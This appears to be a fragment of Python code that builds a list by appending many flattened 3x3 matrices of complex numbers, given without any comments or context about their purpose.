M.append([(90.4380182828+10.2030588154j),(-2.99858853358+12.2247098741j),(1.86973840721+12.1389149621j),(6.12922272739-6.47740307026j),(102.775844599-7.38433146556j),(6.17254267126-12.255129101j),(4.28821896433+4.1209203619j),(7.3126323395+6.32885875893j),(100.786137118+3.18127265014j),]) M.append([(38.8861320849+10.1505335444j),(2.14666733675-5.36030635831j),(-20.6640899117+10.9838814507j),(18.6280991385+9.3808739943j),(31.6605230415-6.61813084097j),(-23.2912444259+39.8108077143j),(-24.4922953663-18.6568614351j),(-17.326064466-20.1733307593j),(83.4533448735+2.46759729661j),]) M.append([(108.952754185-3.03766270091j),(-7.07654059633+4.54168685545j),(-4.39952380147-3.11021769295j),(-10.604699689-3.58273315552j),(110.331686494+8.22323847175j),(-5.59469889626-6.40191048738j),(-2.60649111856-4.73717359587j),(-2.63513430541+1.10828901094j),(117.715559321+0.814424229157j),]) M.append([(108.438287875-1.71235799445j),(-0.980025465093+2.44163982571j),(-6.90259702023-2.63971902618j),(2.21453349895-6.1513024649j),(107.683723375+3.73351606326j),(-8.06248131595-3.54283036103j),(-5.26604700664-1.58017909336j),(0.362442887568+3.16549265716j),(108.87798875+3.97884193118j),]) M.append([(115.771742786+1.09455734058j),(1.26155275714+0.00991845906265j),(-0.469550747029+0.0501142551183j),(-0.096576097054+1.33225352743j),(114.203192996+2.43287611851j),(1.15515675569-0.45734106756j),(0.0967132989732+0.0213271866209j),(0.622363533422-1.17569090105j),(115.025064218+2.47256654091j),]) M.append([(51.8740924065-9.9473057704j),(-1.6877721684-10.9355456828j),(-6.73494272582+24.7927650057j),(-30.716254771+20.0023698513j),(36.521558766+24.0401454944j),(32.1046624502-51.7745755422j),(-5.11230429033+2.30396700671j),(0.00196128307363+4.56915385546j),(49.6043488276-8.09283972401j),]) M.append([(101.106989476+2.52806070078j),(0.0881501925551+0.348714253317j),(-0.54434208302+0.405968462942j),(0.0451567468427+1.11467526711j),(100.219154892+2.57376808126j),(-0.514755829071+0.978804481376j),(0.181570849771-1.66659397385j),(1.55597567459-1.00259129729j),(101.673855632+0.898171217958j),]) M.append([(94.5202347156+10.4400283851j),(18.9539877646-27.8378209674j),(3.66327850401+12.959755997j),(24.6110604674+7.61728149984j),(24.6214785862-23.4871632843j),(30.2467009331-18.4136183716j),(0.285561258404+15.2269611065j),(7.78645407995-48.5568649122j),(116.858286698+19.0471348992j),]) M.append([(114.120065105+16.6204055341j),(5.47170880013-2.89259414311j),(11.2389029047-20.8913962309j),(-16.8678020374-43.9193230724j),(64.4699614339-10.1285078182j),(-22.693754849+38.9966815731j),(40.7501832075-19.6673153339j),(-1.92661114514-23.4418159337j),(62.4099734613-0.491897715897j),]) M.append([(79.0434688886-16.3992625267j),(-37.3083187547+0.952285556278j),(35.0504789115-3.1601970007j),(-16.1349757502+8.42942825157j),(102.781580088+16.3246536279j),(6.0864459513-13.5225265296j),(26.2943707091+12.7560589848j),(28.9190592692-2.5091438624j),(87.1749510233+6.07460889879j),]) M.append([(77.6507701086-133.231442271j),(118.84212929-139.929883571j),(-178.054905517+116.051374551j),(-125.270077925+103.442947376j),(-164.756339409+33.5940785155j),(255.574745824+35.1395414081j),(-154.876594105+58.7987472662j),(-214.34987405-27.0456375363j),(278.105569301+105.637363756j),]) M.append([(46.6234139093-53.6473019035j),(-51.8627078698+67.9993812639j),(-9.74513641303+45.9446313317j),(-20.7727349533-38.4939189008j),(36.0669687135+64.6800113172j),(33.4844751553+19.3662538841j),(-53.2937784509-1.51772407163j),(70.3996439862+36.4891025995j),(71.3096173772-5.0327094137j),]) M.append([(107.720090516+0.137257055709j),(-4.98341702488+0.456584835084j),(-5.25224214038+1.89016882704j),(3.35976974574-5.30842832935j),(117.786077986-0.819647312135j),(-2.28236868569-4.32649959958j),(-12.8983301287+0.0283541073106j),(-7.53142651299+4.52665478843j),(111.493831498+6.68239025643j),]) M.append([(115.872213125+23.0841506039j),(-26.4267541706+6.70091842498j),(-4.57324204967-12.4506309701j),(-20.2119576472+12.6945162232j),(94.864491205-21.2444006901j),(8.76358954321-8.10496442782j),(-7.81782462877-3.83056878595j),(4.61446209307-9.39998604869j),(114.26329567+4.16025008623j),]) M.append([(115.806921354+1.68629504775j),(0.606922660151+0.149853378455j),(0.152225870768-0.0937664061063j),(-1.08162269761+0.429004670779j),(116.112571469+3.95819999302j),(2.44882950681-1.73177384118j),(0.802309972014+1.23309572746j),(1.48772472867-1.5176487605j),(113.080507178+0.355504959225j),]) M.append([(43.7762209378+0.972730447932j),(-4.42132818339-3.7736442372j),(0.761394132857+10.4768413525j),(2.02541652482+2.93977020591j),(33.4548764751+7.52134421935j),(17.346488202+1.69260304922j),(-0.241510149522-7.81008452837j),(-2.57878965989+9.0990549463j),(60.7689025872-2.49407466728j),]) M.append([(64.2623461438+12.1170436959j),(41.1199076107-70.1987638993j),(-36.189218078+86.183738173j),(-4.6559562642+36.5577098624j),(57.3372123377+23.1112584198j),(-58.4577897033-19.9532225238j),(-18.5447080902+1.58776389876j),(-7.10460944985+28.2301524246j),(13.4004415185-29.2283021158j),]) M.append([(52.2693790035+0.732844554415j),(-2.23676120918-1.44201384259j),(4.49655626152+3.72546303629j),(0.98020894761+12.5181263573j),(58.6586748501+4.21560891756j),(-5.50116791048-1.69731585694j),(2.11340192622-3.9235761641j),(1.24339125873-2.773771845j),(46.0719461464+1.05154652803j),]) M.append([(58.4293873098-2.56519679305j),(3.56921843044+11.4546883098j),(-6.16180204675+9.08542220635j),(-11.4131588825-5.00338584929j),(39.1363500813-4.40765712171j),(6.94010188193-6.82827268261j),(-36.9367422738-60.6490237564j),(25.3233542312-45.5463765018j),(102.434262609+12.9728539148j),]) M.append([(38.7654560269-5.01765354851j),(-2.45839828327+4.28273186131j),(3.97627794931+4.54998847332j),(-15.7569264772+7.34388799294j),(51.1107020325+7.85662473808j),(6.95074737216-9.1698812475j),(-1.45536420609-3.57631435483j),(-1.0408609686+1.62743908037j),(44.1238419406+3.16102881043j),]) M.append([(40.2645723782-35.8288179903j),(-10.5284466758-21.4403945181j),(17.2637913727-36.5215047967j),(4.48260010649+78.0062053518j),(64.2567142307+45.1159093925j),(-31.5282197636+79.8066384055j),(38.3862786136-22.1320620923j),(15.7407069807-23.4284555474j),(88.4787133911-3.28709140222j),]) M.append([(49.3992313916-5.41210388598j),(-13.4050372358-8.49726861687j),(15.2940960409-0.428460339781j),(-2.79905998997-6.52677217665j),(33.2915083464+8.79939763525j),(2.81393011024-10.7480776868j),(5.37661448126-3.20354627111j),(-6.95513442897-6.53135484782j),(51.309260262+2.61270625074j),]) M.append([(52.8615251967-2.62126760396j),(-3.4047505298+0.964649545712j),(4.60120743716+2.06347644505j),(8.48528163691-9.26856611408j),(41.1914045753+2.03077249791j),(8.26622259762+2.07350887621j),(5.12089092519+4.67737496164j),(1.70078672946-3.90233801081j),(45.947070228+6.59049510605j),]) M.append([(42.6748477396-1.48758430113j),(-3.39479651951+1.991038341j),(-4.25497055529+0.135613311091j),(5.88594722349-20.9095590445j),(34.688138744-10.7620523372j),(-8.26512427252-17.1685488031j),(-10.9709571408+17.0941276924j),(6.37689394567+13.5276656573j),(48.6370135163+18.2496366383j),]) M.append([(39.3084184975+7.57523126396j),(-1.49456106612-6.50846022986j),(8.86379426834-0.165935202684j),(-0.783774197071+3.35249664554j),(37.6342413119+4.86964646058j),(1.15242516826+0.182968989315j),(7.59835172352-1.21592628387j),(-3.16634063328+3.2681841633j),(38.0573401906-6.44487772454j),]) M.append([(73.4396611935+18.6152944325j),(-54.7844678935-27.5894964976j),(-72.9743950849+18.9001902833j),(-8.5372180687-8.06337354342j),(56.1888061712+15.3526894251j),(24.0754801738+0.159299355059j),(-17.5686394784+3.51554695851j),(32.0462179011-6.03380821726j),(66.3715326353-27.9679838576j),]) M.append([(47.3617650842+3.13013582142j),(0.261532528818-1.48132564601j),(-0.763304331776+1.32990895048j),(-1.17494323349+5.85962917849j),(41.5366617395-3.19919833835j),(-7.6615680225+3.96881304449j),(2.54401365498+0.840695198196j),(-5.03960329479+4.10459478781j),(50.1015731764+6.06906251693j),]) M.append([(36.206208175-0.679429081505j),(20.2923019998-21.4667594945j),(-2.36707635676-0.136166226618j),(-2.39990535536-2.2613918862j),(56.6222352021+2.46175905933j),(-1.43142638292+1.59307931711j),(5.54117064368+12.2774837926j),(-25.0329307856-5.59968168682j),(53.1715566229+4.21767002217j),]) M.append([(44.0581999752+2.15504119439j),(-1.32607958106-2.38576378542j),(-0.173085787241+0.880342926966j),(-1.26396277515-2.35023635834j),(41.4601301005+3.84269812214j),(0.631938718675-0.634609893267j),(-9.64143727067+6.21170762707j),(7.03240004251-0.726893048223j),(38.4816699243+0.00226068347492j),]) M.append([(49.423055106+5.30702050333j),(-2.1844639789+0.717157225753j),(1.17602978292+1.55075826354j),(-2.38046465775+0.00657959472325j),(47.6873685607+0.88250205063j),(-0.699271034054+0.328359001592j),(1.31967466757-2.31757907921j),(1.69466236725+0.376909162482j),(48.8895763333-0.189522553962j),]) M.append([(43.0801502568-3.57302505132j),(-5.93322228229+2.17652608813j),(3.99641208275-3.7260982609j),(-7.96522903991+1.77532151819j),(47.1951365439+9.32695120093j),(-4.16046344649-5.73742366336j),(-0.246657841139+2.11713780449j),(1.46418630726+1.29200151224j),(44.7247131993+0.246073850391j),]) M.append([(32.3563054557-34.3223734844j),(74.3146613192-12.2963076807j),(15.8151530118-81.3493705084j),(24.4472390132+1.9147982714j),(70.7041480103+24.0071311467j),(0.0277353455317+18.783021965j),(21.0010931976-20.1789333983j),(-8.34294159705+28.0509417615j),(132.939546534+16.3152423378j),]) M.append([(55.8903836483+44.5745855194j),(-12.8068388371+20.7005202639j),(-0.16281857375-29.1357539992j),(6.21903755918-44.9294294897j),(91.6023258784-21.0307392843j),(19.2581945321+3.60868236089j),(-2.45851017196+112.38384883j),(23.9093098985+32.6332907402j),(83.5072904733-17.5438462352j),]) M.append([(118.430611651+5.05744139129j),(2.27864026873+4.13941930374j),(2.84363511839-2.67110846424j),(-8.94181413-3.46102573999j),(107.379332081-1.45411036526j),(-1.9598928401+7.06620168898j),(0.793985667658-10.6282739343j),(3.45292714849-9.14580821862j),(105.190056269+2.39666897397j),]) M.append([(101.439452289+6.2556263395j),(-4.44134612086+9.9854815941j),(0.541631237721-6.03202165002j),(13.6744788655-0.877907738434j),(121.272035401-6.56005984623j),(-2.33088484464+5.8981906363j),(6.95225464662-8.56938302597j),(-1.51284956737-7.85013552135j),(118.28851231+6.30443350672j),]) M.append([(-37.6077880573+33.8570622267j),(79.860921131-24.9546064594j),(-50.0560450081+34.8707782151j),(-84.5167196772+18.0428924194j),(130.194455541-7.14189064674j),(-52.7758494577+29.0828727734j),(105.002886506-20.2357417165j),(-80.9224083653+13.0157726784j),(125.413332516-20.7151715799j),]) M.append([(9.68881778204+5.46872186088j),(-3.91894842393-5.94023761918j),(-6.57907793043+6.89903708352j),(0.138922358115+7.41878823293j),(0.00855868159921-15.2943232331j),(-20.6381995324+16.197964365j),(8.16435599329-5.82226097528j),(-14.7875019912+22.7017768482j),(42.3026235364+15.8256013723j),]) M.append([(111.035169962+3.91473436476j),(1.30439018791-1.8770035433j),(4.02916357002+3.61739899774j),(3.54997066578+4.89581795353j),(112.114092732-2.38368804521j),(4.90995616488-7.452036982j),(1.23860275167-6.0622987681j),(-1.151072073+5.34358528899j),(107.850737306+4.46895368045j),]) M.append([(115.586070589-0.835299827489j),(-0.213811737107-7.92156810185j),(0.0305412401335+5.97234707075j),(1.53210959417+0.0544430065483j),(115.794781525+4.11097717992j),(0.266015879708-0.84728493399j),(2.68455259683-0.940885794956j),(7.40558071971-2.6312819298j),(109.619147886+2.72432264756j),]) M.append([(120.407336629+107.338403611j),(94.949314614+47.4343104542j),(-123.470530061+41.2169154322j),(-0.740762308126-32.3032786533j),(84.9786886482-14.9949923912j),(38.816447417-9.94472868285j),(-79.5534625325+23.4807203518j),(-18.5313981406+82.2935883023j),(59.6139747231-86.3434112197j),]) M.append([(96.699495915+14.3336103364j),(12.2545996637+3.69377548026j),(7.14178855743+25.3274815665j),(4.84496960799-17.3742808919j),(100.718680052+4.69294209863j),(-12.2867831372-16.3282230386j),(-0.14377442193-32.8907141712j),(-17.388902697+13.2978465289j),(80.5818240332-13.026552435j),]) M.append([(57.2713957418-9.52620011683j),(2.1190637297-5.76424270197j),(10.9369705925+32.0282851489j),(71.2334747114-32.100922752j),(85.3349084082+1.79041160235j),(-38.7919091682+55.1548328297j),(-3.11985519935-37.4407131072j),(6.51914175095-14.1792594553j),(65.39369585+13.7357885145j),]) M.append([(105.984980787+15.8147773646j),(40.938219025-1.20766009818j),(28.8636468818+45.3477592018j),(42.9357295956+38.5738094191j),(72.0289683846+17.8344267571j),(2.71743752154+46.4695515923j),(-64.6231825893+13.988396919j),(-37.0770372411+18.295044871j),(-4.01394917187-27.6492041217j),]) M.append([(110.135943334-6.61845583275j),(8.17136620807+9.06534818191j),(4.78926420395-11.8769351757j),(20.3141680409-9.78181544421j),(100.436569254+34.3725305295j),(35.9791419869-5.18257715017j),(-9.31707723653-11.2517236477j),(23.2295609965+1.84901318362j),(101.427487412-21.7540746968j),]) M.append([(102.080093172-7.8582270909j),(8.86723010988-27.341844521j),(-62.0081419059+15.4991874643j),(-50.8633033022+30.4696095177j),(29.7183388713+16.2324306786j),(39.8755313015-45.0070670655j),(14.0167760445+20.7927691723j),(9.07338320898+13.2329779593j),(13.2015679569-2.37420358769j),]) M.append([(115.78989224+1.11952033434j),(-0.6393759426-1.20029396238j),(3.64016040905-0.563044738844j),(-2.95627856829-5.45162705489j),(113.550780312-0.4206480816j),(4.55321584963-7.60600337018j),(9.29104318703+3.48480644087j),(4.60582616483+5.04343241627j),(107.659327448+5.30112774726j),]) M.append([(108.338507131+0.555332248979j),(-2.12183121349-1.9549962019j),(2.3866759127-2.43725010999j),(4.95665087407-2.0440892995j),(117.33638462+2.40911660472j),(-1.40880679015+2.4741561876j),(1.96622423007-1.12660345853j),(1.53834773638-0.839621556235j),(113.325108249+3.0355511463j),]) M.append([(62.2082145753+10.7914621282j),(-74.4271218992+61.9717437994j),(-71.2625758161-18.366069734j),(4.26614987305-11.7811156466j),(110.541858193-20.6494521846j),(11.213881992-13.2002964016j),(-5.31322295871+14.1018389636j),(4.25717835794+28.2578288521j),(100.249927232+15.8579900565j),]) M.append([(120.108156918+15.9495598371j),(-81.7574723609+1.31818874098j),(35.7339890624-10.8815893057j),(-15.0583607867+13.0297433682j),(59.3964027663-19.1385469582j),(2.56313575977+8.8164783772j),(-66.5963288516-29.3615658597j),(101.182065763+9.8677292627j),(15.4954403157+9.18898712114j),]) M.append([(138.584366482-65.3587447679j),(11.0024692311+63.2936515249j),(104.523451667+12.6162010719j),(28.9361329156+10.9743722749j),(76.07075934+9.26043324636j),(1.13170373614+42.5806127553j),(18.7497195312+71.5501927175j),(-50.1258868222-37.2724388649j),(20.3448741776+62.0983115215j),]) M.append([(102.977434117+1.58010170317j),(8.53587037058+5.12765902793j),(1.40904410784-8.65202284309j),(-0.524983977128-0.678357959187j),(104.64287797-6.23065508483j),(-7.29546819275-0.918138307071j),(-1.26531674204+1.45809419696j),(-12.7193843025+9.70806951816j),(112.379687913+10.6505533817j),]) M.append([(60.6101847827-11.7656611135j),(8.57249833116-10.1684535243j),(11.9826223089+39.5530013528j),(23.5533980475+30.7197640692j),(87.6676903561+0.1732672621j),(14.757549753-39.363298474j),(-28.5717968659+24.3801231938j),(4.77066314755-3.77130879163j),(133.722124861+17.5923938514j),]) M.append([(98.3717724028+1.19192627661j),(1.15803307798-3.71305329502j),(-4.28113327689-2.09202183833j),(0.214849178695-0.814971838035j),(100.393693509+4.61163828316j),(3.7300155367+0.0227510566886j),(-0.427588050409-0.445938609466j),(1.12116021542-3.00878553438j),(96.234534088+0.196435440232j),]) M.append([(0.897252552564-31.2229754591j),(-37.1485336657+23.532336361j),(42.6885360488+27.2716084302j),(-130.512949581+111.05409733j),(88.3580268694+126.450189632j),(114.837591562-105.794017244j),(-60.2041329625+96.9947425675j),(55.8486938591+69.7836006791j),(91.744720578-89.2272141731j),]) M.append([(90.5679266383-5.63900177157j),(25.4651283177-2.02225592556j),(0.175309589231+38.9908673649j),(6.54634870419+25.369364421j),(96.0857518474-12.4125648841j),(21.9639227197-12.9669286589j),(-12.3769808582-28.5511750462j),(22.4890485616+14.7529063455j),(86.3463215143+24.0515666557j),]) M.append([(64.7194961657+15.0236567134j),(1.24160427076-18.7339990977j),(-20.8329678736-0.408513591399j),(-4.50039072194+17.9132785409j),(75.7272949754-1.81594218055j),(-2.13813883686-10.7727854226j),(-15.1315854135+3.32083300374j),(7.19789990282+1.61015945114j),(50.5532088589-7.20771453284j),]) M.append([(92.1067355959-21.228312875j),(-1.82847675433-6.90162289145j),(59.9982744143-34.1964830401j),(-31.3529551465-36.3086796426j),(16.1941759489-2.8308276286j),(-33.0038105607-42.3492276549j),(14.5766117805+27.8750001801j),(5.6883096641+11.5267047583j),(45.6990884553+30.0591405036j),]) M.append([(114.469547894-0.149649366744j),(-3.79047546094-15.394342886j),(-5.629964028-2.57591953257j),(-2.41879694919+4.01519790112j),(105.09659061+4.76536569873j),(-3.66198420576+4.96123207514j),(-0.415571236482-3.31036354529j),(0.191920655822-0.0187553278631j),(117.433861496+1.38428366801j),]) M.append([(107.638009276+2.30590235779j),(-1.06044143551-4.89164927922j),(2.45025252468+0.0691321907232j),(2.59467758445+0.821722933936j),(109.798621967+2.46998218509j),(5.24755238983-1.00205136525j),(4.85126442214-1.9759305286j),(4.39871889184+5.79397214664j),(107.563368757+1.22411545712j),]) M.append([(114.571665029+1.6430551606j),(-0.358612592142+1.22631108554j),(0.622544771696-0.731228914655j),(-0.778867853839+0.727334395407j),(115.128827827+2.75881732951j),(1.09523027116-1.35944945904j),(0.464168613801-0.447769226316j),(0.0233242099688+0.671601670922j),(115.299507144+1.59812750988j),]) M.append([(40.2447608266-4.64019301449j),(4.6887938642-3.16642231274j),(-0.228733470949-5.74736057061j),(-19.6885893241+25.193613873j),(32.9597559693+3.90539719171j),(2.13890573101+20.2098103659j),(31.0321343194+40.1524341659j),(-6.4824531641+12.4897226462j),(64.7954832041+6.73479582277j),]) M.append([(10.7351081746+24.2154529208j),(43.1098811732-26.3344776033j),(18.4108653602-14.9427364395j),(-12.9859851643+20.9023171353j),(63.8368594119+6.26842243688j),(23.9896438198-1.06445852472j),(-0.371623386333+47.6387682039j),(95.3295752381-48.2137704812j),(48.4280324135-24.4838753577j),]) M.append([(68.917998036+22.933443651j),(0.724980356452+68.4044559574j),(14.6417686669-48.5617900561j),(12.9944696965+5.36402158391j),(129.09042753-15.0352440964j),(-24.9641479264+5.38750411652j),(27.1799220595+53.9702648332j),(75.6240535703-8.31031139136j),(52.9915744341-1.89819955462j),]) M.append([(78.0116329838+13.3413254779j),(17.8666168131-24.4439184751j),(-23.0185793723-35.0993417162j),(2.21796946646-9.90834024446j),(92.0798575827+16.6845583952j),(18.9863961869+7.71860654312j),(-10.2790813585+13.2752070894j),(11.129843675-28.102161461j),(61.9085094335-24.025883873j),]) M.append([(42.4983729096+4.23368397779j),(11.0779729571+4.74770832409j),(8.79233162264-10.7322843387j),(15.4700855653+1.07185423205j),(52.3955233096-2.80700861224j),(-9.14634918729+7.21885303639j),(4.15871279764-0.49100312926j),(-2.10916059575-1.38770658166j),(59.1061037808+4.57332463444j),]) M.append([(43.2010582971+3.76147270053j),(5.06966601738+1.65096119181j),(-0.828047217425-3.94774567677j),(6.73400546755+0.67108168663j),(52.2745342963+0.828898652082j),(5.23353276741-1.42469180954j),(-8.89258641003+12.9949336148j),(9.39139119723+2.05240525258j),(42.5244074066+1.40962864739j),]) M.append([(60.291909822-85.9098201152j),(-96.7114686934+34.1318185732j),(-63.279476302-48.784634407j),(-60.1960366619-49.7371433097j),(46.6734138016+65.9218086062j),(-55.1287090443-14.5289057471j),(8.51413821079+44.4122181371j),(58.0351431347-8.65053441005j),(129.034676376+25.988011509j),]) M.append([(57.2223080733-14.5894153153j),(-5.43619286942+44.8305940821j),(18.4647602942-20.973850589j),(6.1899933242-54.7817160181j),(66.7232533409-11.2957436759j),(26.4121442789+28.4990339494j),(16.8635500801-17.4679348598j),(-3.17922794183-40.1854660607j),(107.054438586+31.8851589912j),]) M.append([(89.3779540376-15.684058726j),(-24.0219911952+14.923619471j),(13.8392313806-7.91939421688j),(-2.91748421882+1.25133591921j),(116.492640917+5.14804250445j),(0.359731131474-2.05595531076j),(17.2964986571-30.6274887286j),(-18.2078436802-27.9060423989j),(125.129405045+16.5360162215j),]) M.append([(115.121060878-0.767066849334j),(2.81954990769+0.265936021862j),(2.13529729338-5.99514219799j),(1.82620577539+2.93851670374j),(112.213031817+2.9714322675j),(0.994081004594+6.14393056981j),(-0.853577997153+1.32711066002j),(-0.770620856483-0.55279930698j),(113.665907305+3.79563458183j),]) M.append([(79.5091489514-7.86872227324j),(15.0750320468-27.9173017376j),(-1.81588567328-2.34803742699j),(19.1774015474+31.602143956j),(83.1031980165+11.2926577854j),(-0.316497711607+1.96113816469j),(9.85842770874+12.4317288182j),(12.5055868972-24.2422402905j),(55.387653032+2.57606448788j),]) M.append([(-10.7639369088-4.71491319576j),(0.194460276322-10.1635373659j),(-28.1482170613-1.31615239111j),(24.2912974623-3.23542161173j),(13.4526236669+12.5729713647j),(29.8891810492-13.2994914413j),(29.5622029544+5.76445147639j),(1.52576816221+14.0420981728j),(49.3113132419-1.85805816897j),]) M.append([(27.2880197203-0.198542083362j),(0.708989636253+5.52970407518j),(3.62256611625+4.71360129481j),(-6.00179427506+5.619267408j),(40.5208201014+4.27292875515j),(9.21387885757-2.36656116969j),(3.20641016988-1.60149167892j),(-3.24707271589-1.93214096861j),(28.1911601783+1.92561332821j),]) M.append([(44.9466157359+2.05520114921j),(-1.17399778213-14.4772841394j),(-0.200052413381-7.83381839007j),(-3.21073638629+16.9262530049j),(51.7600959947+4.64035696305j),(12.9376190865+2.22608186037j),(0.957174212437+16.5388924368j),(19.0768086091-2.83804793139j),(43.2932882695-0.695558112264j),]) M.append([(88.1040130046-4.5962559946j),(16.8999737583+23.0734901433j),(30.7914653073-2.83774365937j),(-3.03405690915-53.8250077406j),(78.7307978097-21.8122568768j),(-7.34821240042-42.824955567j),(-5.8033412214+32.2542817518j),(-18.8556622956+15.1984179407j),(59.1651891857+32.4085128714j),]) M.append([(100.132241782+2.80652852416j),(-12.0037710375+24.4995009546j),(13.1775112898-19.596276059j),(3.86158482291+11.1431417314j),(53.7660796149+3.89633155568j),(36.163615561+4.26056298157j),(-0.552599386501-5.51568686529j),(15.366305058+1.82276943005j),(78.1016786031-0.702860079843j),]) M.append([(36.1700377694+0.788879139446j),(1.87339129622+4.52744237795j),(-0.795724677153+7.81782058675j),(2.51410253676-2.0620365432j),(34.5637629025+3.80750379591j),(1.31606317624+7.01829539997j),(-2.53017879508-2.70480635151j),(2.40774917494-2.00300597053j),(38.2661993281+1.40361706464j),]) M.append([(51.1329523521+39.3020099618j),(-22.19883915+19.9719875971j),(12.8746066511-43.5327999384j),(-35.9387827826-38.0845741193j),(53.2176107797-38.0638112983j),(27.6130306684+58.8475832671j),(-30.422782837+7.90508284347j),(-20.8876878902-14.3503091787j),(90.6494368682+4.76180133646j),]) M.append([(74.5848056917-2.87937180467j),(14.649951561-13.6384668211j),(0.761858438358+28.0419302618j),(-27.9677387355+21.5024389776j),(38.6785662111+25.7866363677j),(-16.2620102555-32.0587947218j),(-21.1677440569-23.2353496448j),(-22.1294555104-4.33775960432j),(72.7366280972-16.907264563j),]) M.append([(89.6409808264-24.0644050407j),(34.1176624142-53.5010015289j),(60.1441464809-18.7363654038j),(-49.4929225707+2.31442943173j),(-8.96595000845+16.67936692j),(-35.8311101468-17.6282907945j),(65.0757734215+3.21536752781j),(46.0393591276-17.9691621945j),(73.3249691821+13.3850381207j),]) M.append([(126.094410936-18.719837293j),(18.5917439917+84.2317953311j),(-52.4378366516-22.6044590754j),(-8.66294550732+2.20952755223j),(136.342374454-18.0752407238j),(4.88060621752+19.116842327j),(-16.1037388475-16.9440653218j),(88.1043153369+15.3184354742j),(74.5632146096+42.7950780168j),]) M.append([(105.131208121+1.16551980655j),(-5.50220622359-0.521844693964j),(-6.09781295937-1.74086685691j),(-1.13871461751-3.8404779386j),(109.461465729+0.688864242216j),(-3.84724888006-4.98544897127j),(-0.741307686981+2.3588917472j),(-1.86323852909+3.78551520526j),(110.40732615+4.14561595123j),]) M.append([(112.647368172+3.46291682676j),(5.01632476909+1.19203242934j),(-1.8161994672-0.308853637803j),(-0.800663475776+1.90848707295j),(117.685418629+0.898661666242j),(-1.71536800663+0.12422762108j),(-0.955694023425-1.24582032701j),(-0.394875472366+3.40977379633j),(114.667213199+1.638421507j),]) M.append([(39.2987492642+5.93299457883j),(0.021020093806+0.65706911979j),(-1.68659181894-9.03967591788j),(-0.0528426814725-21.0262884848j),(46.6252263792+8.06512212522j),(10.7277141695+12.1094958742j),(-15.3829412909+6.96896895641j),(2.4989247782-7.71593192674j),(52.0760243567-7.99811670404j),]) M.append([(25.4409946585+10.1229568134j),(-20.6266342892-1.03219595084j),(-26.0716999805+4.27801744408j),(-40.5551426362-6.25170113991j),(52.9221761666-10.8701086807j),(49.3685372743-26.3912153826j),(-15.7526137644-16.6859645257j),(24.1650043549+9.57773528654j),(40.6368291749+6.74715186728j),]) M.append([(97.1648038497+0.917278863354j),(8.42872373786+4.11888666282j),(1.83533543164-5.93394402263j),(-5.13861070969-1.67997958383j),(111.613729192+3.94014636013j),(1.10619281473-2.41783343181j),(-1.4999890956-1.24668451227j),(-2.18303150023+3.51084706034j),(115.221466959+1.14257477652j),]) M.append([(32.2781524653-10.8335736313j),(-11.477098315-1.94441125417j),(30.5604223589-5.69195368489j),(-2.28672532687+1.26432404203j),(95.3289402441-0.244701068773j),(1.38725547086+3.73774568129j),(-47.7554501197-49.4155174188j),(-11.9872580717-16.4501582208j),(132.392907291+17.0782747j),]) M.append([(48.8739092189+21.0414854593j),(18.4286946997+6.66839764558j),(11.5684868625+3.1319417351j),(41.8264013013+11.2758550926j),(62.4583611206-16.162106647j),(17.4322884845-0.670569224455j),(57.5630569583+23.9050749696j),(63.0410196547-34.4716882111j),(33.6677296605+1.12062118777j),]) M.append([(107.421253261-2.21525933416j),(-9.62291237659+3.04519580826j),(-1.76530063451+0.672778063195j),(-6.64524512021+1.38766564373j),(111.601598197+8.52990491017j),(-1.76101948714+2.07367905559j),(-3.30246471603-11.0665876661j),(-8.93262668426-7.34502452798j),(117.977148542-0.314645576008j),]) M.append([(120.066362552+13.6308045542j),(-15.8142972721+9.96619128033j),(-8.56256989133-8.95114771178j),(-7.79122729675+8.96473171438j),(100.222550388-7.10341686068j),(3.47627499407-11.5836026859j),(-5.59953748288+0.899534475002j),(-1.76524619414-7.62882047766j),(118.71108706-0.527387693518j),]) M.append([(100.424679037+11.3189222514j),(30.5832847874-2.77989266028j),(-11.1263217517+0.889442796716j),(23.3141100315-17.5939284971j),(70.7492038358+15.3871654021j),(13.8808763113-0.832814787103j),(-40.8714905106-20.0521985317j),(45.0598245468+58.3359890465j),(101.826117127-20.7060876536j),]) M.append([(53.522377728-24.7327141648j),(25.9465878779+17.6756193083j),(22.2962151663+16.5235965433j),(6.80910179169+4.49437471352j),(27.7439523976+9.74845232103j),(-0.267941695066-4.91585126912j),(31.6214423496-0.381969047204j),(2.01063888294+32.9343217283j),(22.7336698744+20.9842618438j),]) M.append([(26.0527653112+3.65382228716j),(1.79173256584+0.927354422958j),(5.82811425234-0.288718188109j),(-2.51351814003+16.1770044989j),(34.9740294362-2.40716243352j),(2.6812426065-13.9142026987j),(21.927051613-3.0718228198j),(-7.52696619548-2.26340052801j),(11.9732052526+4.75334014636j),]) M.append([(31.2598231126+1.28301612762j),(1.04490299664+0.0181872083329j),(-1.01842984055+0.730615034965j),(-0.534400904762+0.0511240531337j),(32.5548564679+1.87546143199j),(-0.372386496407+0.60852685037j),(-0.266626912014+0.874680012589j),(0.43369971633-0.430838301427j),(32.1853204195+2.84152244039j),]) M.append([(55.569696269+0.37436222177j),(-2.96256120577+4.08300338316j),(-11.7471007605+6.770435033j),(-1.54997794833+5.05908330025j),(60.0966516015+4.53078521102j),(-16.838163165-6.87151232095j),(-6.92292694483-5.62201278307j),(-2.18384342164+1.59514808133j),(69.3336521295+1.09485256721j),]) M.append([(91.3701018074+6.56615678597j),(21.2404503118-35.7196455059j),(-11.2152059153+27.9031122447j),(7.56773482672+9.46685409615j),(79.3159997789+23.9769726333j),(5.90137500034-16.0589211988j),(-10.5574703117-20.5534341111j),(2.65996254685+35.7865842129j),(85.3138984137-24.5431294192j),]) M.append([(32.9557721974+2.96482702755j),(-8.36325791325-5.6542800258j),(-4.38840724967+12.7174220106j),(34.1471563098-15.2729716468j),(80.6044436068-0.765903489678j),(2.38025146909+13.7790941722j),(-3.57299060108-31.6345171634j),(6.10432365238-29.6847028001j),(56.4397841958+3.80107646213j),]) M.append([(133.343462836+13.5312525347j),(87.8161574369+4.07087792871j),(-62.9630428487+19.6755218062j),(-9.15030822078-28.2233812816j),(29.7561354629-20.5163024377j),(9.45206430247+7.93091055917j),(20.2126555531-14.7498799171j),(15.0304383435-9.41429799865j),(27.9004017013+12.985049903j),]) M.append([(43.4343498808+10.350617143j),(8.21491765865+2.49285485582j),(-0.889360649832+5.76904773727j),(8.85277709959-2.52857743462j),(41.9800452701-3.46179510117j),(6.82641624329-4.34642135981j),(7.83988562129-1.15554406621j),(-0.595865757901-4.18059406355j),(51.585604849-0.888822041875j),]) 